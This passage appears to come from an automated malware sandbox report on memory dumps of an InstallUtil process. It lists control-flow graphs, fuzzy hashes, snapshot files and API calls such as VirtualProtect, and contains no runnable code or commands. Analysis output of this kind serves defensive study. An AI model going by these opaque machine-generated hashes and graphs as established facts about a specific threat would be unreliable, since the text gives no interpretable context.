                                              control_flow_graph 2502 4da098d-4da09f9 2508 4da09fb-4da0a25 2502->2508 2509 4da0a2e-4da0a40 2502->2509 2508->2509 2520 4da0a27 2508->2520 2512 4da0a46-4da0a69 2509->2512 2513 4da0b25-4da0b63 2509->2513 2521 4da0b11-4da0b1a 2512->2521 2529 4da0bdc-4da0c16 2513->2529 2530 4da0b65-4da0bda 2513->2530 2520->2509 2522 4da0b20 2521->2522 2523 4da0a86-4da0a8f 2521->2523 2525 4da0d22-4da0d66 2522->2525 2526 4da12ca-4da12cf 2523->2526 2527 4da0a95-4da0abc 2523->2527 2547 4da0d6c-4da0d8d 2525->2547 2548 4da0f44-4da0f60 2525->2548 2527->2526 2534 4da0ac2-4da0b0b 2527->2534 2544 4da0c1d-4da0c28 2529->2544 2530->2544 2555 4da0b0d 2534->2555 2556 4da0b10 2534->2556 2544->2525 2549 4da0c2e-4da0c37 2544->2549 2557 4da0f2b-4da0f3e 2547->2557 2558 4da0d93 2547->2558 2607 4da0f66 call 4da2810 2548->2607 2608 4da0f66 call 4da2801 2548->2608 2549->2526 2550 4da0c3d-4da0c57 2549->2550 2581 4da0cb8-4da0cd0 2550->2581 2582 4da0c59-4da0c71 2550->2582 2555->2556 2556->2521 2557->2547 2557->2548 2561 4da0d9a-4da0da6 2558->2561 2562 4da0e3a-4da0e83 2558->2562 2563 4da0e88-4da0ebb 2558->2563 2564 4da0ee8-4da0ef4 2558->2564 2565 4da0ebd-4da0ee6 2558->2565 2566 4da0f02-4da0f24 2558->2566 2567 4da0db7-4da0def 2558->2567 2568 4da0df4-4da0e35 2558->2568 2561->2526 2571 4da0dac-4da0db2 2561->2571 2562->2557 2563->2557 2564->2526 2575 4da0efa-4da0f00 2564->2575 2565->2557 2566->2557 2567->2557 2568->2557 2569 4da0f6c-4da0f9d 2605 4da0fa3 call 4da85f0 2569->2605 2606 4da0fa3 call 4da8600 2569->2606 2571->2557 2575->2557 2581->2526 2585 4da0cd6-4da0d07 2581->2585 2582->2526 2586 4da0c77-4da0cb6 2582->2586 2604 4da0d12-4da0d1c 2585->2604 2586->2604 2593 4da0fa9 2593->2526 2604->2525 2604->2549 2605->2593 2606->2593 2607->2569 2608->2569
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1aeda3650e2441cabcbb8402eddcbf7c0c8c0a580900dc9848f726a31b3957fc
                                              • Instruction ID: bdb11f0f9f0c8a5acfe47d0b726d79cd6e3349b55461272334c32966a812bf52
                                              • Opcode Fuzzy Hash: 1aeda3650e2441cabcbb8402eddcbf7c0c8c0a580900dc9848f726a31b3957fc
                                              • Instruction Fuzzy Hash: 5D02E974A00218DFDB65DF68C894A9DB7F2FB88300F558599E50AAB361DB30EE85CF41
                                              Function 04EA73BC Relevance: .3, Instructions: 324COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417119026.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4ea0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b3714343d634065e0b52d2e75249fbe171eb16f037b1a77a751e26f7f98a5ba9
                                              • Instruction ID: 486265b295f709145f00a239fcdda52862692ec255a64a5f788d0a17f5fe7454
                                              • Opcode Fuzzy Hash: b3714343d634065e0b52d2e75249fbe171eb16f037b1a77a751e26f7f98a5ba9
                                              • Instruction Fuzzy Hash: ADC19D34B00540CBD715EB6AE0947AE72B3FB84306F269568E4029F289DF38BD56CB85
                                              Function 04DAD308 Relevance: .2, Instructions: 222COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42a709b6336cb1b85b01403fdf231897e5eb9c5d10d564ca7c890be519e5097c
                                              • Instruction ID: 91c53da3c3c43c85c54a0fd57dbcbcd773aa0c1d02cec578f0aa1f165133f81b
                                              • Opcode Fuzzy Hash: 42a709b6336cb1b85b01403fdf231897e5eb9c5d10d564ca7c890be519e5097c
                                              • Instruction Fuzzy Hash: 35919E34A04248CFEB10CF59D584BEDB7F3FB85304F598065E405ABAA8DBB8A995CF50
                                              Function 04DAD318 Relevance: .2, Instructions: 221COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5358f566e8bf63a8e32c3da2b43fa7b9971ad5044fd805082de07e334bc85f36
                                              • Instruction ID: 87c18504ff839b41ac1ff303e57e8cb0216d5df5535438e1baaacda8edae9606
                                              • Opcode Fuzzy Hash: 5358f566e8bf63a8e32c3da2b43fa7b9971ad5044fd805082de07e334bc85f36
                                              • Instruction Fuzzy Hash: 6D919D34A00244CFEB10CF59D584BEDB7F3FB85304F598065E405ABA98DBB8A995CF10
                                              Function 04DAD46C Relevance: .2, Instructions: 203COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e94b02ba9e34661392631e8da828a549157a09c126e51e5876f183791c0a80e3
                                              • Instruction ID: 9cae4a514dcbbe77bf69dbf0a9863d6fa2e4664371d0e7faa937fa65a01909ee
                                              • Opcode Fuzzy Hash: e94b02ba9e34661392631e8da828a549157a09c126e51e5876f183791c0a80e3
                                              • Instruction Fuzzy Hash: 8B816A34A04244CFEB10CF59D584BEDB7F3FB85304F598065E445ABAA8DBB8B9A5CB10
                                              Function 04DADA68 Relevance: .2, Instructions: 166COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcafb936f83f43a0e08d11af2e45f95c14664ec0d4c3e35555af89f2bae94298
                                              • Instruction ID: e84ab5c392b66db9f418ada95833c4ac3b99c3ec31e7d24120389be63fab6255
                                              • Opcode Fuzzy Hash: fcafb936f83f43a0e08d11af2e45f95c14664ec0d4c3e35555af89f2bae94298
                                              • Instruction Fuzzy Hash: 8851DF34B04145CFEB54DF26E894BAA73F3FBD8311F1484A5E4069BAA8DB74AC56CB40
                                              Function 04DA87F1 Relevance: .1, Instructions: 139COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63eac70f19e9f8dd084afebc860cdb1cd18931b7a84f20bb503fbbb479def989
                                              • Instruction ID: a389942ce525119129c562b85e71286b2358ea6e20915f2ef02b8b53cdbb1f51
                                              • Opcode Fuzzy Hash: 63eac70f19e9f8dd084afebc860cdb1cd18931b7a84f20bb503fbbb479def989
                                              • Instruction Fuzzy Hash: A9516C70E04209CFDB04EFAAE494BADB7F1FB48304F508069E416AB295EF346945DF42
                                              Function 04DA8800 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8c2675a1266a2d93e303b8ce5679c8c04a1304efc44b9f70155c5996d6c1942
                                              • Instruction ID: 38036cf06069613f7045bfa1c3502ab66bb7059c1ca9b11ace5981f51aa7d785
                                              • Opcode Fuzzy Hash: a8c2675a1266a2d93e303b8ce5679c8c04a1304efc44b9f70155c5996d6c1942
                                              • Instruction Fuzzy Hash: 31515974E00209CFDB54EFAAE494BADB7F1FB88304F409069E416AB294EF346945DF42
                                              Function 04DA0040 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 326 4da0040-4da007f 327 4da0081 326->327 328 4da0086-4da0098 326->328 327->328 330 4da009a-4da00b6 call 4da1380 328->330 331 4da00bc-4da00c8 328->331 330->331 332 4da00ce-4da00d3 331->332 333 4da0842 331->333 335 4da0106-4da0126 332->335 336 4da00d5-4da00de 332->336 338 4da0847-4da084b 333->338 335->333 348 4da012c-4da026b 335->348 336->333 337 4da00e4-4da0101 336->337 340 4da097a-4da0980 337->340 341 4da07fe-4da0815 338->341 342 4da084d 338->342 349 4da098a 340->349 350 4da0982 340->350 366 4da0820-4da0837 341->366 343 4da08fa-4da0938 342->343 344 4da08d9-4da08f8 342->344 345 4da088e-4da08b0 342->345 346 4da0854-4da0889 342->346 347 4da08b5-4da08d4 342->347 367 4da093a-4da0957 343->367 368 4da0967 343->368 365 4da096d-4da0975 344->365 345->365 346->365 347->365 387 4da044f-4da0480 348->387 388 4da0271-4da027d 348->388 350->349 365->340 366->333 367->333 374 4da095d-4da0965 367->374 368->365 374->367 374->368 395 4da04eb-4da051c 387->395 396 4da0482-4da04b4 387->396 388->333 389 4da0283-4da02d2 388->389 411 4da02df-4da02eb 389->411 412 4da02d4-4da02dd 389->412 407 4da067f-4da06c7 395->407 408 4da0522-4da05dd 395->408 409 4da04ce-4da04e9 396->409 410 4da04b6-4da04b9 396->410 419 4da06c9-4da071e 407->419 420 4da0724-4da0768 407->420 467 4da05df-4da061b 408->467 468 4da061d-4da0620 408->468 409->395 409->396 410->409 413 4da04bb-4da04cb 410->413 421 4da02ed-4da02f2 411->421 422 4da02f7-4da0303 411->422 412->411 413->409 419->420 444 4da076a-4da0776 420->444 445 4da07d7-4da07f9 420->445 423 4da0437-4da0449 421->423 428 4da030f-4da031b 422->428 429 4da0305-4da030a 422->429 423->387 423->388 436 4da031d-4da0322 428->436 437 4da0327-4da0333 428->437 429->423 436->423 442 4da033f-4da034b 437->442 443 4da0335-4da033a 437->443 451 4da034d-4da0352 442->451 452 4da0357-4da0363 442->452 443->423 453 4da077e-4da079a 444->453 445->340 451->423 457 4da036f-4da037b 452->457 458 4da0365-4da036a 452->458 453->366 460 4da07a0-4da07a8 453->460 465 4da037d-4da0382 457->465 466 4da0387-4da0393 457->466 458->423 460->333 461 4da07ae-4da07b5 460->461 461->338 464 4da07bb-4da07d5 461->464 464->444 464->445 465->423 474 4da039f-4da03ab 466->474 475 4da0395-4da039a 466->475 477 4da0664-4da0679 467->477 469 4da0622-4da063e 468->469 470 4da0640-4da0658 468->470 469->477 470->477 481 4da03ad-4da03b2 474->481 482 4da03b7-4da03c3 474->482 475->423 477->407 477->408 481->423 485 4da03cc-4da03d8 482->485 486 4da03c5-4da03ca 482->486 488 4da03da-4da03df 485->488 489 4da03e1-4da03ed 485->489 486->423 488->423 491 4da03ef-4da03f4 489->491 492 4da03f6-4da0402 489->492 491->423 494 4da040b-4da0417 492->494 495 4da0404-4da0409 492->495 497 4da0419-4da041e 494->497 498 4da0420-4da042c 494->498 495->423 497->423 500 4da042e-4da0433 498->500 501 4da0435 498->501 500->423 501->423
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416891437.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4da0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2
                                              • API String ID: 0-450215437
                                              • Opcode ID: 679fcd2112209b05963777ac8b8bfc97a819094bcf8a1426584aedf8a2317c81
                                              • Instruction ID: b11d73e67adf80ad2e0655a46861e2726975e9a3aa0cc6ef3dc0c277226ca775
                                              • Opcode Fuzzy Hash: 679fcd2112209b05963777ac8b8bfc97a819094bcf8a1426584aedf8a2317c81
                                              • Instruction Fuzzy Hash: CE423574A002058FDB25EF69D894BADBBF2FB89300F1184A9D4499B759EB70AD81CF41
                                              Function 04F1DF38 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 810 4f1df38-4f1df4a 811 4f1df74-4f1df78 810->811 812 4f1df4c-4f1df6d 810->812 813 4f1df84-4f1df93 811->813 814 4f1df7a-4f1df7c 811->814 812->811 816 4f1df95 813->816 817 4f1df9f-4f1dfcb 813->817 814->813 816->817 820 4f1dfd1-4f1dfd7 817->820 821 4f1e1f8-4f1e23f 817->821 822 4f1e0a9-4f1e0ad 820->822 823 4f1dfdd-4f1dfe3 820->823 852 4f1e241 821->852 853 4f1e255-4f1e261 821->853 826 4f1e0d0-4f1e0d9 822->826 827 4f1e0af-4f1e0b8 822->827 823->821 825 4f1dfe9-4f1dff6 823->825 829 4f1e088-4f1e091 825->829 830 4f1dffc-4f1e005 825->830 832 4f1e0db-4f1e0fb 826->832 833 4f1e0fe-4f1e101 826->833 827->821 831 4f1e0be-4f1e0ce 827->831 829->821 834 4f1e097-4f1e0a3 829->834 830->821 835 4f1e00b-4f1e023 830->835 836 4f1e104-4f1e10a 831->836 832->833 833->836 834->822 834->823 838 4f1e025 835->838 839 4f1e02f-4f1e041 835->839 836->821 841 4f1e110-4f1e123 836->841 838->839 839->829 848 4f1e043-4f1e049 839->848 841->821 843 4f1e129-4f1e139 841->843 843->821 846 4f1e13f-4f1e14c 843->846 846->821 847 4f1e152-4f1e167 846->847 847->821 861 4f1e16d-4f1e190 847->861 850 4f1e055-4f1e05b 848->850 851 4f1e04b 848->851 850->821 858 4f1e061-4f1e085 850->858 851->850 854 4f1e244-4f1e246 852->854 856 4f1e263 853->856 857 4f1e26d-4f1e289 853->857 859 4f1e248-4f1e253 854->859 860 4f1e28a-4f1e2b7 call 4f18d50 854->860 856->857 859->853 859->854 872 4f1e2b9-4f1e2bf 860->872 873 4f1e2cf-4f1e2d1 860->873 861->821 866 4f1e192-4f1e19d 861->866 869 4f1e19f-4f1e1a9 866->869 870 4f1e1ee-4f1e1f5 866->870 869->870 878 4f1e1ab-4f1e1c1 869->878 874 4f1e2c1 872->874 875 4f1e2c3-4f1e2c5 872->875 896 4f1e2d3 call 4f1e341 873->896 897 4f1e2d3 call 4f1f0f1 873->897 898 4f1e2d3 call 4f1e350 873->898 874->873 875->873 877 4f1e2d9-4f1e2dd 879 4f1e328-4f1e338 877->879 880 4f1e2df-4f1e2f6 877->880 884 4f1e1c3 878->884 885 4f1e1cd-4f1e1e6 878->885 880->879 888 4f1e2f8-4f1e302 880->888 884->885 885->870 891 4f1e315-4f1e325 888->891 892 4f1e304-4f1e313 888->892 892->891 896->877 897->877 898->877
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 40ff0ec51c75a2d52894ffb8ff8a60a6d6c73f18ac18e9ccf50b67272a82264b
                                              • Instruction ID: d38698ba9b7a498a04e56a0fda40a252a89d4f96db5762e20334bc4b3bbaa7fa
                                              • Opcode Fuzzy Hash: 40ff0ec51c75a2d52894ffb8ff8a60a6d6c73f18ac18e9ccf50b67272a82264b
                                              • Instruction Fuzzy Hash: 28D17C34700611CFDB24DF29C484A6AB7F2FF88311B558969E85A9B761DB30FD46CB90
                                              Function 00CAD6E0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 899 cad6e0-cad761 VirtualProtect 902 cad76a-cad78f 899->902 903 cad763-cad769 899->903 903->902
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00CAD754
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2410684461.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ca0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 912314bb86c348c88878b44b5446222ecbb606db9284b1cb1df975f0a9563197
                                              • Instruction ID: dedf59e1f67380d891831403fb8352fe9a11141465f71da27d4931fa9ae6daa7
                                              • Opcode Fuzzy Hash: 912314bb86c348c88878b44b5446222ecbb606db9284b1cb1df975f0a9563197
                                              • Instruction Fuzzy Hash: 701124B5D003499FDB14DFAAC484B9EFBF4EF48314F50842AD429A7240D7799944CFA5
                                              Function 04D40B28 Relevance: 1.4, Instructions: 1383COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2416380212.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4d40000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96243b3e7035b86e2f0f8739637a7a66b33ba9c90b9128539ae1fef94325c2d2
                                              • Instruction ID: 86864e9aaaa8a870b2e05ae59dc70b02fdf9004f9fbb8b841d7eb2ea4ec92c3f
                                              • Opcode Fuzzy Hash: 96243b3e7035b86e2f0f8739637a7a66b33ba9c90b9128539ae1fef94325c2d2
                                              • Instruction Fuzzy Hash: F1A2D630F002259BEB351E65545C33F61E6AFC9A96B54412ADA87E7388EF34FC418BD2
                                              Function 00CAD890 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1570 cad890-cad8ff CloseHandle 1573 cad908-cad92d 1570->1573 1574 cad901-cad907 1570->1574 1574->1573
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2410684461.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ca0000_InstallUtil.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 6afe815053558ee05b63d5f41709148fa67e134bc5ad2cb67940f05d41313e7e
                                              • Instruction ID: 9549480059c5e6088bc2377a28ecf9734602ac9ef82934105a700aa0a81c8247
                                              • Opcode Fuzzy Hash: 6afe815053558ee05b63d5f41709148fa67e134bc5ad2cb67940f05d41313e7e
                                              • Instruction Fuzzy Hash: 691155B5D003498FDB24DFAAD44479FBBF4EB88314F20842AC11AA7240DB79A944CBA5
                                              Function 04F1A9B1 Relevance: .5, Instructions: 548COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1969 4f1a9b1-4f1a9b8 1970 4f1aa21-4f1aa2f 1969->1970 1971 4f1a9ba-4f1a9e3 1969->1971 1978 4f1aa31-4f1aa32 1970->1978 1979 4f1aa1d-4f1aa20 1970->1979 1973 4f1a9f2-4f1a9fb 1971->1973 1974 4f1a9e5-4f1a9f0 1971->1974 1974->1973 1976 4f1a9fe-4f1aa1c 1974->1976 1976->1979 1980 4f1aa83-4f1aaaa call 4f19ac8 1978->1980 1981 4f1aa34-4f1aa45 call 4f16578 1978->1981 1979->1970 1989 4f1aab0 1980->1989 1990 4f1acaf-4f1acc1 call 4f1a508 1980->1990 1986 4f1aa4a-4f1aa4c 1981->1986 1986->1980 1988 4f1aa4e-4f1aa79 call 4f195b0 1986->1988 1988->1980 1998 4f1aa7b-4f1aa80 1988->1998 1995 4f1aab9-4f1aac1 1989->1995 1996 4f1ace0-4f1ace6 1990->1996 1997 4f1acc3-4f1acdb 1990->1997 1999 4f1aac3 1995->1999 2000 4f1aaca-4f1aacd 1995->2000 2016 4f1acf5-4f1ad3d 1996->2016 2017 4f1ace8-4f1acef 1996->2017 1997->1996 2035 4f1acdd 1997->2035 1998->1980 1999->2000 2001 4f1abb1-4f1abc4 1999->2001 2002 4f1ab50-4f1ab63 1999->2002 2003 4f1ac32-4f1ac4e 1999->2003 2004 4f1ab98-4f1abac 1999->2004 2005 4f1ab38-4f1ab4b 1999->2005 2006 4f1aaf8-4f1ab33 1999->2006 2007 4f1ac1a-4f1ac2d 1999->2007 2008 4f1ab7f-4f1ab93 1999->2008 2009 4f1aae1-4f1aaf3 1999->2009 2010 4f1ac01-4f1ac15 1999->2010 2011 4f1abc9-4f1abe5 1999->2011 2012 4f1ab68-4f1ab7a 1999->2012 2013 4f1abea-4f1abfc 1999->2013 2014 4f1ac50-4f1ac81 2000->2014 2015 4f1aad3-4f1aad6 2000->2015 2001->1990 2002->1990 2003->1990 2004->1990 2005->1990 2006->1990 2007->1990 2008->1990 2009->1990 2010->1990 2011->1990 2012->1990 2013->1990 2014->1990 2018 4f1ac83-4f1acad 2015->2018 2019 4f1aadc 2015->2019 2112 4f1ad3f call 4f1b9c9 2016->2112 2113 4f1ad3f call 4f1b9d8 2016->2113 2017->2016 2021 4f1acf1-4f1acf3 2017->2021 2018->1990 2019->1990 2037 4f1ad47-4f1ad49 2021->2037 2035->1996 2039 4f1b06d-4f1b076 2037->2039 2040 4f1ad4f-4f1ad58 2037->2040 2043 4f1ad6a-4f1adaa call 4f19c88 2040->2043 2044 4f1ad5a-4f1ad62 2040->2044 2042 4f1ad45 2042->2037 2053 4f1adac-4f1adbc 2043->2053 2054 4f1adbe 2043->2054 2044->2043 2053->2054 2055 4f1adc0-4f1adc2 2053->2055 2054->2055 2057 4f1ade1-4f1ae10 2055->2057 2058 4f1adc4-4f1addf 2055->2058 2063 4f1ae4d-4f1ae55 2057->2063 2067 4f1ae12-4f1ae3e 2057->2067 2058->2063 2065 4f1ae63 2063->2065 2066 4f1ae57-4f1ae61 2063->2066 2068 4f1ae68-4f1ae6a 2065->2068 2066->2068 2067->2063 2076 4f1ae40-4f1ae44 2067->2076 2069 4f1ae7a-4f1aeec 2068->2069 2070 4f1ae6c-4f1ae72 2068->2070 2078 4f1af10-4f1af36 2069->2078 2079 4f1aeee-4f1af05 2069->2079 2070->2069 2076->2063 2081 4f1af38-4f1af43 2078->2081 2082 4f1af4d 2078->2082 2079->2078 2110 4f1af45 call 4f1bea8 2081->2110 2111 4f1af45 call 4f1be4b 2081->2111 2083 4f1af4f-4f1af6e 2082->2083 2083->2039 2086 4f1af74-4f1af86 call 4f1a508 2083->2086 2084 4f1af4b 2084->2083 2086->2039 2089 4f1af8c-4f1afa4 2086->2089 2091 4f1afa6-4f1afaf 2089->2091 2092 4f1afdd-4f1aff5 2089->2092 2093 4f1afb1-4f1afb4 2091->2093 2094 4f1afbe-4f1afc5 2091->2094 2097 4f1b025-4f1b03d 2092->2097 2098 4f1aff7-4f1b000 2092->2098 2093->2094 2094->2092 2095 4f1afc7-4f1afd8 2094->2095 2095->2039 2097->2039 2104 4f1b03f-4f1b048 2097->2104 2100 4f1b002-4f1b005 2098->2100 2101 4f1b00f-4f1b018 2098->2101 2100->2101 2101->2097 2102 4f1b01a-4f1b022 2101->2102 2102->2097 2105 4f1b057-4f1b060 2104->2105 2106 4f1b04a-4f1b04d 2104->2106 2105->2039 2108 4f1b062-4f1b06a 2105->2108 2106->2105 2108->2039 2110->2084 2111->2084 2112->2042 2113->2042
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81bae1c3a867035904334d69b4fc64f294d6d4c6b026b6a38ae1ee24f381685d
                                              • Instruction ID: 66b9a072d95bc5e211fe23466c685fb9bdce0fc5a8267a6fc30a18a685bcb1eb
                                              • Opcode Fuzzy Hash: 81bae1c3a867035904334d69b4fc64f294d6d4c6b026b6a38ae1ee24f381685d
                                              • Instruction Fuzzy Hash: 8E228B31B00204DFDB14DF69D494AADBBB2EF88310F158069E906EB3A5EB71ED41CB90
                                              Function 04F1E480 Relevance: .5, Instructions: 481COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2114 4f1e480-4f1e4a8 2117 4f1e4f6-4f1e504 2114->2117 2118 4f1e4aa-4f1e4f1 2114->2118 2119 4f1e513 2117->2119 2120 4f1e506-4f1e511 call 4f1b408 2117->2120 2168 4f1e94d-4f1e954 2118->2168 2122 4f1e515-4f1e51c 2119->2122 2120->2122 2125 4f1e522-4f1e526 2122->2125 2126 4f1e605-4f1e609 2122->2126 2127 4f1e955-4f1e97d 2125->2127 2128 4f1e52c-4f1e530 2125->2128 2130 4f1e60b-4f1e61a call 4f195b0 2126->2130 2131 4f1e65f-4f1e669 2126->2131 2138 4f1e984-4f1e9ae 2127->2138 2132 4f1e542-4f1e5a0 call 4f1b148 call 4f1bbb0 2128->2132 2133 4f1e532-4f1e53c 2128->2133 2146 4f1e61e-4f1e623 2130->2146 2134 4f1e6a2-4f1e6c8 2131->2134 2135 4f1e66b-4f1e67a call 4f18db8 2131->2135 2175 4f1ea13-4f1ea3d 2132->2175 2176 4f1e5a6-4f1e600 2132->2176 2133->2132 2133->2138 2158 4f1e6d5 2134->2158 2159 4f1e6ca-4f1e6d3 2134->2159 2152 4f1e680-4f1e69d 2135->2152 2153 4f1e9b6-4f1e9cc 2135->2153 2138->2153 2147 4f1e625-4f1e65a call 4f1e350 2146->2147 2148 4f1e61c 2146->2148 2147->2168 2148->2146 2152->2168 2178 4f1e9d4-4f1ea0c 2153->2178 2166 4f1e6d7-4f1e6ff 2158->2166 2159->2166 2183 4f1e7d0-4f1e7d4 2166->2183 2184 4f1e705-4f1e71e 2166->2184 2185 4f1ea47-4f1ea4d 2175->2185 2186 4f1ea3f-4f1ea45 2175->2186 2176->2168 2178->2175 2187 4f1e7d6-4f1e7ef 2183->2187 2188 4f1e84e-4f1e858 2183->2188 2184->2183 2206 4f1e724-4f1e733 call 4f18d50 2184->2206 2186->2185 2190 4f1ea4e-4f1ea8b 2186->2190 2187->2188 2215 4f1e7f1-4f1e800 call 4f18d50 2187->2215 2192 4f1e8b5-4f1e8be 2188->2192 2193 4f1e85a-4f1e864 2188->2193 2195 4f1e8c0-4f1e8ee call 4f1a940 call 4f1a960 2192->2195 2196 4f1e8f6-4f1e943 2192->2196 2204 4f1e866-4f1e868 2193->2204 2205 4f1e86a-4f1e87c 2193->2205 2195->2196 2222 4f1e94b 2196->2222 2210 4f1e87e-4f1e880 2204->2210 2205->2210 2224 4f1e735-4f1e73b 2206->2224 2225 4f1e74b-4f1e760 2206->2225 2220 4f1e882-4f1e886 2210->2220 2221 4f1e8ae-4f1e8b3 2210->2221 2232 4f1e802-4f1e808 2215->2232 2233 4f1e818-4f1e823 2215->2233 2227 4f1e8a4-4f1e8a9 call 4f17b50 2220->2227 2228 4f1e888-4f1e8a1 2220->2228 2221->2192 2221->2193 2222->2168 2234 4f1e73d 2224->2234 2235 4f1e73f-4f1e741 2224->2235 2238 4f1e762-4f1e78e call 4f19a90 2225->2238 2239 4f1e794-4f1e79d 2225->2239 2227->2221 2228->2227 2241 4f1e80a 2232->2241 2242 4f1e80c-4f1e80e 2232->2242 2233->2175 2243 4f1e829-4f1e84c 2233->2243 2234->2225 2235->2225 2238->2178 2238->2239 2239->2175 2240 4f1e7a3-4f1e7ca 2239->2240 2240->2183 2240->2206 2241->2233 2242->2233 2243->2188 2243->2215
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2417319539.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_4f10000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
